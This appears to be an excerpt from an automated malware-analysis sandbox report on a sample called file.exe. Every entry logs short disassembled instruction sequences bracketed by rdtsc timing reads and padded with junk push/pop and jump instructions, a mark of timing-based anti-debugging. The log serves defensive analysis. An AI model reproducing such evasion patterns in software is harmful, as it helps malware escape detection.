                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3AC00 second address: A3AC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DEh 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jno 00007F74491B01D6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push esi 0x00000018 jmp 00007F74491B01E1h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3AC33 second address: A3AC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A426A4 second address: A426BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F74491B01E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A426BB second address: A426C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41356 second address: A41360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41360 second address: A41368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41368 second address: A4136E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4136E second address: A4137E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F7448D3A04Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4137E second address: A41384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41384 second address: A41388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41388 second address: A413C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F74491B01E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F74491B01E7h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A413C1 second address: A413C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41512 second address: A41518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41518 second address: A4152F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FF6h 0x00000008 jmp 00007F7448D39FFAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4152F second address: A41541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41541 second address: A41547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41674 second address: A41678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A41678 second address: A4169C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7448D3A003h 0x0000000b pop eax 0x0000000c jnp 00007F7448D3A004h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4169C second address: A416A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A417D8 second address: A417DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A419A0 second address: A419AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A419AC second address: A419C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D39FFCh 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45411 second address: A4542D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4542D second address: A45434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48987 second address: A48993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F74491B01D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48AFB second address: A48B24 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7448D39FFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7448D39FFCh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48C50 second address: A48C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48C54 second address: A48C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DBD second address: A48DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DC2 second address: A48DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7448D3A005h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DDB second address: A48DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F74491B01D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DE9 second address: A48DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491B0 second address: A491B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491B4 second address: A491C4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FF6h 0x00000008 jne 00007F7448D39FF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491C4 second address: A491DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F74491B01DDh 0x00000008 jbe 00007F74491B01D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF0B second address: A4EF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A005h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF26 second address: A4EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF2E second address: A4EF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F1C1 second address: A4F1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F74491B01F9h 0x0000000b jmp 00007F74491B01DDh 0x00000010 jmp 00007F74491B01E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F74491B01D6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F1F7 second address: A4F20C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7448D39FF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F20C second address: A4F210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F210 second address: A4F22C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFCh 0x00000007 jmp 00007F7448D39FFCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F4D7 second address: A4F4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A500D0 second address: A500E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A500E9 second address: A500ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A500ED second address: A5010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A007h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5010A second address: A50110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50683 second address: A5069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A007h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54B9E second address: A54BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54CF3 second address: A54CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55129 second address: A5513F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F74491B01DEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5513F second address: A55145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552C6 second address: A552CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552CA second address: A552CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552CE second address: A552D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552D4 second address: A552DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552DA second address: A552E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55455 second address: A55484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A001h 0x00000009 popad 0x0000000a jmp 00007F7448D3A009h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A555EE second address: A55634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F74491B01D6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F74491B01E7h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F74491B01DDh 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA49 second address: A5BA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A636EE second address: A63716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F74491B01DCh 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F74491B01E4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A618D4 second address: A618D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A618D8 second address: A618EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61A3D second address: A61A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61A45 second address: A61A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61A4C second address: A61A68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7448D3A002h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61CF3 second address: A61D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E1h 0x00000009 je 00007F74491B01D6h 0x0000000f jbe 00007F74491B01D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61D19 second address: A61D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61E55 second address: A61E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F74491B01E1h 0x0000000c jnl 00007F74491B01D8h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A622BE second address: A622D5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7448D39FF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F7448D39FF6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6259F second address: A625A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A626C4 second address: A626C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A626C9 second address: A62726 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F74491B01DCh 0x00000008 push eax 0x00000009 jmp 00007F74491B01DFh 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jng 00007F74491B01DCh 0x00000018 jmp 00007F74491B01E7h 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F74491B01E3h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E0F second address: A62E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ADA4 second address: A6ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F74491B01D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jg 00007F74491B01DEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A823 second address: A6A82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A82C second address: A6A834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A834 second address: A6A83A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A714B9 second address: A714CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F74491B01D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7135C second address: A71373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A003h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A783A7 second address: A783AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A780A8 second address: A780D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7448D3A001h 0x0000000b popad 0x0000000c jmp 00007F7448D3A008h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD22 second address: A7CD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DFh 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F74491B01E0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD49 second address: A7CD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD4E second address: A7CD59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F74491B01D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD59 second address: A7CD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD65 second address: A7CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD7B second address: A7CD8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F7448D39FF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CED0 second address: A7CEDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89F9A second address: A89FAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7448D39FFAh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B679 second address: A8B687 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F74491B01D8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90AF9 second address: A90B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7448D39FF6h 0x0000000a jns 00007F7448D39FF6h 0x00000010 popad 0x00000011 jmp 00007F7448D3A007h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90B21 second address: A90B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F74491B01DAh 0x0000000e jmp 00007F74491B01DBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95484 second address: A95497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7448D39FFEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95760 second address: A9576B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F74491B01D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A958BB second address: A958CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A965DF second address: A965EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F74491B01D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A965EB second address: A965F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7448D39FFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A0FE second address: A9A103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A103 second address: A9A117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7448D39FFDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02B7 second address: AA02BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02BB second address: AA02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02BF second address: AA02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0119 second address: AA0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A005h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
